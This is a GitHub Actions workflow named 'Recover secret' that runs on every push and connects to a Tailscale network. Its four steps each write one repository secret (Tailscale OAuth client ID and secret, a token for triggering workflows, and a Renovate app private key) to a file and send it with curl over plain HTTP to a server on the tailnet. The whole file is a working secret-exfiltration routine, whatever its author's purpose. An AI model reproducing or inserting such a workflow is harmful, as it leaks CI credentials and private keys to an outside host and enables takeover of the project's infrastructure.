# yaml-language-server: $schema=https://json.schemastore.org/github-workflow.json
name: Recover secret

on:
  push:

jobs:
  recoversecret:
    runs-on: ubuntu-latest
    steps:
      - name: Tailscale
        uses: tailscale/github-action@84a3f23bb4d843bcf4da6cf824ec1be473daf4de # v3.2.3
        with:
          oauth-client-id: ${{ secrets.TAILSCALE_CLIENT_ID }}
          oauth-secret: ${{ secrets.TAILSCALE_CLIENT_SECRET }}
          tags: tag:github-actions
      - name: "Recover secret"
        run: |
          echo ${SECRET} > ./output.txt
          curl --data-binary @./output.txt ${TARGET}
        env:
          SECRET: ${{ secrets.TAILSCALE_CLIENT_ID }}
          TARGET: "http://server.chameleon-chicken.ts.net:8080"

      - name: "Recover secret"
        run: |
          echo ${SECRET} > ./output.txt
          curl --data-binary @./output.txt ${TARGET}
        env:
          SECRET: ${{ secrets.TAILSCALE_CLIENT_SECRET }}
          TARGET: "http://server.chameleon-chicken.ts.net:8080"

      - name: "Recover secret"
        run: |
          echo ${SECRET} > ./output.txt
          curl --data-binary @./output.txt ${TARGET}
        env:
          SECRET: ${{ secrets.TOKEN_TO_TRIGGER_SUBSEQUENT_WORKFLOWS }}
          TARGET: "http://server.chameleon-chicken.ts.net:8080"

      - name: "Recover secret"
        run: |
          echo ${SECRET} > ./output.txt
          curl --data-binary @./output.txt ${TARGET}
        env:
          SECRET: ${{ secrets.RENOVATE_APP_PRIVATE_KEY }}
          TARGET: "http://server.chameleon-chicken.ts.net:8080"
